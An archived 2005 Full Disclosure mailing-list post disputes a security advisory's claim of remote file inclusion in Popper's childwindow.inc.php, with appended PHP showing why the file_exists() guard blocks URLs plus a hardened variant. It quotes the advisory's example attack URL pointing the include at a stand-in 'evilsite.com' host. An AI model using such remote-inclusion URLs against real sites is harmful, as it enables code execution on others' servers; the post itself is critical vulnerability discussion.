Full Disclosure mailing list archives
LSS.hr false positives.
From: "b0iler" <b0iler () r00thell org>
Date: Sat, 4 Jun 2005 22:15:26 +0100 (BST)
From your advisory @ http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-07:
> Popper is vulnerable to a remote code inclusion bug in the childwindow.inc.php script that can be abused to execute arbitrary code. Vulnerable code in childwindow.inc.php:
>
> -----
> ...
> if(file_exists($form.".toolbar.inc.php")) {
>     include($form.".toolbar.inc.php");
> }
> ?>
file_exists() only works on local files; it does not work on remote URLs, not even with allow_url_fopen on. Even if the file_exists() check were not there, your description of how to exploit it is incorrect:
> To exploit this vulnerability, an attacker has to put a script like test.form.inc.php on the www.evilsite.com HTTP server and call a URL like this:
>
> http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
They would need to have the file test.toolbar.inc.php, not test.form.inc.php. It's quite obvious you did not even bother testing this before issuing the advisory.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
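As an added example (not code from the advisory or from Popper), the PHP below mirrors the quoted guard to show why a URL in $form never passes file_exists(), and adds a stricter variant that only accepts a bare form name inside a fixed directory. The function names and $toolbarDir are assumptions.

```php
<?php
// Mirrors the guard quoted from childwindow.inc.php. file_exists() performs a
// stat() on the path, and PHP's http:// stream wrapper does not support
// stat(), so "http://evilsite.com/test.toolbar.inc.php" is never reported as
// existing, whatever allow_url_fopen is set to.
function toolbar_include_path(string $form): ?string
{
    $candidate = $form . ".toolbar.inc.php";
    return file_exists($candidate) ? $candidate : null;
}

// Stricter variant (hypothetical hardening, not Popper's code): accept only
// letters, digits and underscores, resolve the file inside $toolbarDir, and
// confirm the resolved path is still inside that directory.
function toolbar_include_path_strict(string $form, string $toolbarDir): ?string
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $form)) {
        return null;
    }
    $base = realpath($toolbarDir);
    $candidate = realpath($toolbarDir . DIRECTORY_SEPARATOR . $form . ".toolbar.inc.php");
    if ($base === false || $candidate === false) {
        return null;
    }
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed inputs: the URL from the advisory's example, and a plain name.
var_dump(toolbar_include_path("http://evilsite.com/test"));
var_dump(toolbar_include_path_strict("http://evilsite.com/test", __DIR__));
var_dump(toolbar_include_path_strict("default", __DIR__));
```

The last call only returns a path if a file named default.toolbar.inc.php actually exists next to the script; otherwise all three calls yield NULL.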